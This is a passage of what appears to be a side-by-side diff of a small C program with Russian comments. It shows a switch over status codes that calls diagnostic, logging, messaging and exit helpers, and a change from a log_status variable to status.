{ {
my_msg(); my_msg(); // Отправляем сообщение
my_fin(); my_fin(); // Завершаем программу
} }
} }
break; break;
case 0: // Некорректные параметры или запрос справки
default: // Некорректные параметры или запрос справки case -1:
case -10:
case -20:
case -101:
case -600:
my_diag(); // Выводим диагностику my_diag(); // Выводим диагностику
log_status = my_log(); // Логируем событие my_log(); // Логируем событие
if (log_status == 0) // Без уведомления if (status == 0) // Без уведомления
{ {
my_fin(); // Завершаем программу my_fin(); // Завершаем программу
} }
else if (log_status == 1) // С уведомлением else if (status == 1) // С уведомлением
{ {
my_msg(); // Отправляем сообщение my_msg(); // Отправляем сообщение
my_fin(); // Завершаем программу my_fin(); // Завершаем программу
} }
break; break;
} }
return 0; // Возвращаем код успешного завершения return 0; // Возвращаем код успешного завершения
} }

BIN
src/a.out

Binary file not shown.